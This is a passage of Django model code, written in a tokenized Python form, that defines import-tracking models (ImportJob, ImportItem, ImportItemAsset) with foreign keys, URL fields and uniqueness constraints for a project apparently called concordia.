on_delete=models.SET_NULL)<line_sep>project=models.ForeignKey("concordia.Project" on_delete=models.CASCADE)<line_sep>url=models.URLField(verbose_name="Source URL for the entire job")<def_stmt>__str__ self<block_start><return>"ImportJob(created_by=%s, project=%s, url=%s)"%(self.created_by.username self.project.title self.url )<block_end><block_end><class_stmt>ImportItem(TaskStatusModel)<block_start>""" Record of the task status for each Item being imported """<line_sep>job=models.ForeignKey(ImportJob on_delete=models.CASCADE related_name="items")<line_sep>url=models.URLField()<line_sep>item=models.ForeignKey("concordia.Item" on_delete=models.CASCADE)<class_stmt>Meta<block_start>unique_together=(("job" "item") )<block_end><def_stmt>__str__ self<block_start><return>"ImportItem(job=%s, url=%s)"%(self.job self.url)<block_end><block_end><class_stmt>ImportItemAsset(TaskStatusModel)<block_start>""" Record of the task status for each Asset being imported """<line_sep>import_item=models.ForeignKey(ImportItem on_delete=models.CASCADE related_name="assets")<line_sep>url=models.URLField()<line_sep>sequence_number=models.PositiveIntegerField(validators=[MinValueValidator(1)])<line_sep>asset=models.ForeignKey("concordia.Asset" on_delete=models.CASCADE)<class_stmt>Meta<block_start>unique_together=(("import_item" "sequence_number") ("import_item" "asset"))<block_end><def_stmt>__str__ self<block_start><return>"ImportItemAsset(import_item=%s, url=%s)"%(self.import_item self.url)<block_end><block_end>